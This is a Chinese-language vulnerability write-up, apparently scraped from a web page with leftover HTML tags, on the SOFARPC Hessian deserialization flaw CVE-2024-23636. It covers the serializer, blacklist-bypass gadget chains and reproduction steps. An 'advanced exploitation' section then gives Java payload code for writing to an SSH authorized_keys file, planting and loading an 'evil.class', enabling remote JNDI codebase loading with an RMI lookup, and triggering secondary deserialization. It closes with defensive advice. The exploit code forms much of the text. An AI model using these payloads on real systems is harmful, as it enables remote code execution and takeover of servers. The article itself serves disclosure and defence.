SOFARPC反序列化漏洞(CVE-2024-23636)深度分析与利用指南<\/h1>

0x01 SOFARPC简介与漏洞概述<\/h2>

SOFARPC是阿里巴巴开源的一个高性能、高扩展性、生产级的Java RPC框架。该漏洞存在于SOFARPC 5.12.0之前的版本中，主要问题在于：<\/p>

默认序列化协议<\/strong>：SOFARPC默认使用SOFA Hessian协议进行数据反序列化<\/li>
防护机制缺陷<\/strong>：SOFA Hessian采用黑名单机制限制危险类反序列化，但存在绕过可能<\/li>
漏洞影响<\/strong>：攻击者可构造特定Gadget链绕过黑名单保护，实现远程代码执行(RCE)<\/li>

依赖关系<\/strong>：利用链仅依赖JDK内置类，不依赖任何第三方组件<\/li> <\/ol>
0x02 漏洞技术分析<\/h2>
序列化机制分析<\/h3>
SOFARPC的序列化\/反序列化实现位于com.alipay.sofa.rpc.codec.sofahessian<\/code>包中：<\/p>
\/\/ SofaHessianSerializer.java <\/span><\/span><\/span><\/span>public<\/span> Object decode<\/span>(<\/span>byte<\/span>[]<\/span> array,<\/span> String classType)<\/span> throws<\/span> IOException {<\/span> <\/span><\/span> \/\/ 两种反序列化方式 <\/span><\/span><\/span><\/span> if<\/span> (<\/span>STRING_CLASS.<\/span>equals<\/span>(<\/span>classType))<\/span> {<\/span> <\/span><\/span> return<\/span> deserializeString(<\/span>array);<\/span> <\/span><\/span> }<\/span> else<\/span> {<\/span> <\/span><\/span> return<\/span> deserializeObject(<\/span>array);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>关键点：<\/p> 直接调用序列化\/反序列化方法时不经过黑名单检查<\/li> 反序列化流程本质是Hessian协议的外层封装<\/li> <\/ul> 漏洞利用链分析<\/h3> 基础利用链(5.10.0及以下版本)<\/h4> HashMap.equals <\/span><\/span> UIDefault.equals <\/span><\/span> Hashtable.equals <\/span><\/span> UIDefault.get <\/span><\/span> UIDefault.getFromHashtable <\/span><\/span> SwingLazyValue.createValue <\/span><\/span><\/code><\/pre>5.11.0版本利用链<\/h4> TreeSet.putAll <\/span><\/span>javax.naming.ldap.Rdn$RdnEntry.compareTo <\/span><\/span> com.sun.org.apache.xpath.internal.objects.XStringForFSB.equal <\/span><\/span> javax.swing.MultiUIDefaults.toString <\/span><\/span> UIDefaults.get <\/span><\/span> UIDefaults.getFromHashTable <\/span><\/span> UIDefaults$LazyValue.createValue <\/span><\/span> SwingLazyValue.createValue <\/span><\/span> javax.naming.InitialContext.doLookup() <\/span><\/span><\/code><\/pre>替代利用链<\/h4> TreeSet.putAll <\/span><\/span>javax.naming.ldap.Rdn$RdnEntry.compareTo <\/span><\/span> com.sun.org.apache.xpath.internal.objects.XString.equal <\/span><\/span> javax.sound.sampled.AudioFileFormat.toString <\/span><\/span> UIDefaults.get <\/span><\/span> UIDefaults.getFromHashTable <\/span><\/span> UIDefaults$LazyValue.createValue <\/span><\/span> SwingLazyValue.createValue <\/span><\/span> javax.naming.InitialContext.doLookup() <\/span><\/span><\/code><\/pre>黑名单演进<\/h3> 5.10.0版本<\/strong>：仅限制org.apache.xpath<\/code>相关类<\/li> 5.11.1版本<\/strong>：新增javax.swing.UIDefaults<\/code>黑名单<\/li> 5.12.0版本<\/strong>：黑名单扩展至170+个类，覆盖更多危险类<\/li> <\/ol> 0x03 漏洞复现指南<\/h2> 环境准备<\/h3> 搭建SOFARPC服务端(5.12.0以下版本)<\/li> 参考官方泛化调用文档准备客户端环境<\/li> <\/ol> 攻击步骤<\/h3> 构造特定Gadget链的恶意序列化数据<\/li> 通过RPC客户端将payload发送至服务端<\/li> 观察命令执行结果<\/li> <\/ol> 关键配置<\/h3> 需将黑名单替换为5.11.0版本的黑名单配置以复现漏洞：<\/p> com.sun.org.apache.xpath.internal.objects.XString <\/span><\/span><\/code><\/pre>0x04 高级利用技术<\/h2> SwingLazyValue的深度利用<\/h3> SwingLazyValue.createValue<\/code>可调用sun.reflect.misc.MethodUtil.invoke<\/code>实现任意方法调用：<\/p> 1. 文件操作利用<\/h4> \/\/ 写SSH授权文件 <\/span><\/span><\/span><\/span>byte<\/span>[]<\/span> allBytes =<\/span> Files.<\/span>readAllBytes<\/span>(<\/span>new<\/span> File(<\/span>"\/Users\/snake\/.ssh\/authorized_keys"<\/span>).<\/span>toPath<\/span>());<\/span> <\/span><\/span>Constructor<?><\/span> JavaUtils =<\/span> JavaUtils.<\/span>class<\/span>.<\/span>getDeclaredConstructors<\/span>()[<\/span>0<\/span>];<\/span> <\/span><\/span>JavaUtils.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>Object javaUtils =<\/span> JavaUtils.<\/span>newInstance<\/span>();<\/span> <\/span><\/span>Method bytesToFilename =<\/span> JavaUtils.<\/span>class<\/span>.<\/span>getMethod<\/span>(<\/span>"writeBytesToFilename"<\/span>,<\/span> String.<\/span>class<\/span>,<\/span> byte<\/span>[].<\/span>class<\/span>);<\/span> <\/span><\/span>Method invoke =<\/span> MethodUtil.<\/span>class<\/span>.<\/span>getMethod<\/span>(<\/span>"invoke"<\/span>,<\/span> Method.<\/span>class<\/span>,<\/span> Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>);<\/span> <\/span><\/span>Object[]<\/span> ags =<\/span> new<\/span> Object[]{<\/span>invoke,<\/span> new<\/span> Object(),<\/span> new<\/span> Object[]{<\/span> bytesToFilename,<\/span>javaUtils,<\/span>new<\/span> Object[]{<\/span> "\/Users\/snake\/.ssh\/authorized_keys1"<\/span>,<\/span>allBytes}}};<\/span> <\/span><\/span>SwingLazyValue swingLazyValue =<\/span> new<\/span> SwingLazyValue(<\/span>"sun.reflect.misc.MethodUtil"<\/span>,<\/span>"invoke"<\/span>,<\/span>ags);<\/span> <\/span><\/span><\/code><\/pre>2. 类加载利用<\/h4> \/\/ 类加载攻击 <\/span><\/span><\/span><\/span>byte<\/span>[]<\/span> bytes =<\/span> Files.<\/span>readAllBytes<\/span>(<\/span>new<\/span> File(<\/span>"evil.class"<\/span>).<\/span>toPath<\/span>());<\/span> <\/span><\/span>SwingLazyValue swingLazyValue1 =<\/span> new<\/span> SwingLazyValue(<\/span>"java.lang.System"<\/span>,<\/span>"setProperty"<\/span>,<\/span>new<\/span> Object[]{<\/span>"jfr.save.generated.asm"<\/span>,<\/span>"true"<\/span>});<\/span> <\/span><\/span>SwingLazyValue swingLazyValue2 =<\/span> new<\/span> SwingLazyValue(<\/span>"jdk.jfr.internal.Utils"<\/span>,<\/span>"writeGeneratedASM"<\/span>,<\/span>new<\/span> Object[]{<\/span>"\/tmp\/evil\/"<\/span>,<\/span>bytes});<\/span> <\/span><\/span>SwingLazyValue swingLazyValue3 =<\/span> new<\/span> SwingLazyValue(<\/span>evil,<\/span> null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]);<\/span> <\/span><\/span><\/code><\/pre>3. JNDI攻击(高版本JDK)<\/h4> \/\/ 开启高版本JDK的JNDI出网 <\/span><\/span><\/span><\/span>Object useCodebaseOnly =<\/span> new<\/span> SwingLazyValue(<\/span>"java.lang.System"<\/span>,<\/span>"setProperty"<\/span>,<\/span>new<\/span> Object[]{<\/span>"java.rmi.server.useCodebaseOnly"<\/span>,<\/span>"false"<\/span>});<\/span> <\/span><\/span>Object rmi =<\/span> new<\/span> SwingLazyValue(<\/span>"java.lang.System"<\/span>,<\/span>"setProperty"<\/span>,<\/span>new<\/span> Object[]{<\/span>"com.sun.jndi.rmi.object.trustURLCodebase"<\/span>,<\/span>"true"<\/span>});<\/span> <\/span><\/span>Object ldap =<\/span> new<\/span> SwingLazyValue(<\/span>"java.lang.System"<\/span>,<\/span>"setProperty"<\/span>,<\/span>new<\/span> Object[]{<\/span>"com.sun.jndi.ldap.object.trustURLCodebase"<\/span>,<\/span>"true"<\/span>});<\/span> <\/span><\/span>UIDefaults uiDefaults =<\/span> new<\/span> UIDefaults();<\/span> <\/span><\/span>uiDefaults.<\/span>put<\/span>(<\/span>"a"<\/span>,<\/span> new<\/span> SwingLazyValue(<\/span>"javax.naming.InitialContext"<\/span>,<\/span> "doLookup"<\/span>,<\/span> new<\/span> Object[]{<\/span>"rmi:\/\/127.0.0.1:1099\/remoteExploit8"<\/span>}));<\/span> <\/span><\/span><\/code><\/pre>4. 二次反序列化攻击<\/h4> \/\/ 利用javax.management.remote.rmi进行二次反序列化 <\/span><\/span><\/span><\/span>File file =<\/span> new<\/span> File(<\/span>"jdk的序列化bin"<\/span>);<\/span> <\/span><\/span>byte<\/span>[]<\/span> fileBytes =<\/span> Files.<\/span>readAllBytes<\/span>(<\/span>file.<\/span>toPath<\/span>());<\/span> <\/span><\/span>String base64 =<\/span> Base64.<\/span>getEncoder<\/span>().<\/span>encodeToString<\/span>(<\/span>fileBytes);<\/span> <\/span><\/span> <\/span><\/span>JMXServiceURL jmxServiceURL =<\/span> new<\/span> JMXServiceURL(<\/span>"service:jmx:rmi:\/\/"<\/span>);<\/span> <\/span><\/span>setFieldValue(<\/span>jmxServiceURL,<\/span> "urlPath"<\/span>,<\/span> "\/stub\/"<\/span>+<\/span>base64);<\/span> <\/span><\/span>RMIConnector rmiConnector =<\/span> new<\/span> RMIConnector(<\/span>jmxServiceURL,<\/span> null<\/span>);<\/span> <\/span><\/span>Method connect =<\/span> rmiConnector.<\/span>getClass<\/span>().<\/span>getMethod<\/span>(<\/span>"connect"<\/span>);<\/span> <\/span><\/span>Method invoke =<\/span> MethodUtil.<\/span>class<\/span>.<\/span>getMethod<\/span>(<\/span>"invoke"<\/span>,<\/span> Method.<\/span>class<\/span>,<\/span> Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>);<\/span> <\/span><\/span>Object[]<\/span> ags =<\/span> new<\/span> Object[]{<\/span>invoke,<\/span> new<\/span> Object(),<\/span> new<\/span> Object[]{<\/span> connect,<\/span>rmiConnector,<\/span> null<\/span>}};<\/span> <\/span><\/span><\/code><\/pre>0x05 防御建议<\/h2> 升级SOFARPC<\/strong>：升级至5.12.0或更高版本<\/li> 序列化防护<\/strong>：使用白名单机制替代黑名单<\/li> 考虑使用JSON等更安全的序列化格式<\/li> <\/ul> <\/li> 运行时防护<\/strong>：启用Java安全管理器<\/li> 监控可疑的JNDI\/RMI调用<\/li> <\/ul> <\/li> 网络防护<\/strong>：限制RPC服务的网络暴露范围<\/li> 实施网络层访问控制<\/li> <\/ul> <\/li> <\/ol> 0x06 参考资源<\/h2> Apache Dubbo反序列化漏洞复现分析<\/a><\/li> Hessian协议安全研究<\/a><\/li> XStream黑名单绕过技术<\/a><\/li> SOFARPC官方黑名单文件：5.12.0版本黑名单<\/a><\/li> <\/ol>